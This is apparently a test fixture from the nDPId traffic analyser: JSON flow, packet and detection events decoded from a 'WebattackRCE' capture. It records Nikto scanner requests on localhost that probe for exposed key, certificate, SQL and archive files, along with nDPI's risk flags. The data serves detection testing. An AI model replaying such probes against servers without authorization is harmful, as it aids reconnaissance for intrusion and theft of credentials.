+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":125,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276864,"flow_last_seen":1576420276864,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276864,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49794,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":125,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":125,"flow_packet_id":1,"flow_last_seen":1576420276864,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420276864,"pkt":"AAAAAAAAAAAAAAAACABFAADBqoBAAEAGkbR\/AAABfwAAAcKCH5Cxx5I\/tyTjW4AYAED+tQAAAQEICp1m+6idZvuoR0VUIC8xMjcuMC5zcWwgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"} +01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":125,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276864,"flow_last_seen":1576420276864,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276864,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49794,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":126,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276865,"flow_last_seen":1576420276865,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276865,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49796,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00665{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":126,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":126,"flow_packet_id":1,"flow_last_seen":1576420276865,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420276865,"pkt":"AAAAAAAAAAAAAAAACABFAADBsWVAAEAGis9\/AAABfwAAAcKEH5CGGYkkbARgroAYAED+tQAAAQEICp1m+6mdZvupR0VUIC8xMjcuMC5zcWwgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} +01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":126,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276865,"flow_last_seen":1576420276865,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276865,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49796,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":127,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276866,"flow_last_seen":1576420276866,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276866,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49798,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":127,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":127,"flow_packet_id":1,"flow_last_seen":1576420276866,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420276866,"pkt":"AAAAAAAAAAAAAAAACABFAADBsTlAAEAGivt\/AAABfwAAAcKGH5CzxIl4Ool\/aIAYAED+tQAAAQEICp1m+6qdZvuqR0VUIC8xMjcuMC5wZW0gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} +01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":127,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276866,"flow_last_seen":1576420276866,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276866,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49798,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":128,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276869,"flow_last_seen":1576420276869,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276869,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49800,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00665{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":128,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":128,"flow_packet_id":1,"flow_last_seen":1576420276869,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420276869,"pkt":"AAAAAAAAAAAAAAAACABFAADBxdFAAEAGdmN\/AAABfwAAAcKIH5BDzv2PC6KyZoAYAED+tQAAAQEICp1m+6ydZvusR0VUIC8xMjcuMC5wZW0gSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":128,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276869,"flow_last_seen":1576420276869,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276869,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49800,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":129,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276870,"flow_last_seen":1576420276870,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276870,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49802,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":129,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":129,"flow_packet_id":1,"flow_last_seen":1576420276870,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276870,"pkt":"AAAAAAAAAAAAAAAACABFAADAIL1AAEAGG3l\/AAABfwAAAcKKH5D\/Dxj7MLgvIIAYAED+tAAAAQEICp1m+66dZvuuR0VUIC9zaXRlLnRhciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} +01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":129,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276870,"flow_last_seen":1576420276870,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276870,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49802,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":130,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276871,"flow_last_seen":1576420276871,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276871,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49804,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00665{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":130,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":130,"flow_packet_id":1,"flow_last_seen":1576420276871,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276871,"pkt":"AAAAAAAAAAAAAAAACABFAADAmdRAAEAGomF\/AAABfwAAAcKMH5DqwaGU3VMvd4AYAED+tAAAAQEICp1m+6+dZvuvR0VUIC9zaXRlLnRhciBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":130,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276871,"flow_last_seen":1576420276871,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276871,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49804,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":131,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276872,"flow_last_seen":1576420276872,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276872,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49806,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":131,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":131,"flow_packet_id":1,"flow_last_seen":1576420276872,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276872,"pkt":"AAAAAAAAAAAAAAAACABFAADFFSZAAEAGJwt\/AAABfwAAAcKOH5D96y1nB6jLDIAYAED+uQAAAQEICp1m+7CdZvuwR0VUIC8xMjcuMC4wLjEuY2VyIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":131,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276872,"flow_last_seen":1576420276872,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276872,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49806,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":132,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276873,"flow_last_seen":1576420276873,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276873,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49808,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":132,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":132,"flow_packet_id":1,"flow_last_seen":1576420276873,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276873,"pkt":"AAAAAAAAAAAAAAAACABFAADFhm9AAEAGtcF\/AAABfwAAAcKQH5BNzL4wefiP1IAYAED+uQAAAQEICp1m+7GdZvuxR0VUIC8xMjcuMC4wLjEuY2VyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":132,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276873,"flow_last_seen":1576420276873,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276873,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49808,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":133,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276874,"flow_last_seen":1576420276874,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276874,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49810,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00669{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":133,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":133,"flow_packet_id":1,"flow_last_seen":1576420276874,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420276874,"pkt":"AAAAAAAAAAAAAAAACABFAADCE1BAAEAGKOR\/AAABfwAAAcKSH5DnJisNBZiCk4AYAED+tgAAAQEICp1m+7KdZvuyR0VUIC8xMjcwMDEucGVtIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":133,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276874,"flow_last_seen":1576420276874,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276874,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49810,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":134,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276876,"flow_last_seen":1576420276876,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276876,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49812,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":134,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":134,"flow_packet_id":1,"flow_last_seen":1576420276876,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420276876,"pkt":"AAAAAAAAAAAAAAAACABFAADCnWxAAEAGnsd\/AAABfwAAAcKUH5Co\/aUqs\/1iGoAYAED+tgAAAQEICp1m+7SdZvu0R0VUIC8xMjcwMDEucGVtIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} +01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":134,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276876,"flow_last_seen":1576420276876,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276876,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49812,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":135,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276877,"flow_last_seen":1576420276877,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276877,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49814,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":135,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":135,"flow_packet_id":1,"flow_last_seen":1576420276877,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276877,"pkt":"AAAAAAAAAAAAAAAACABFAADAt7lAAEAGhHx\/AAABfwAAAcKWH5CQPI\/1lm3rwoAYAED+tAAAAQEICp1m+7WdZvu1R0VUIC9zaXRlLmNlciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":135,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276877,"flow_last_seen":1576420276877,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276877,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49814,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 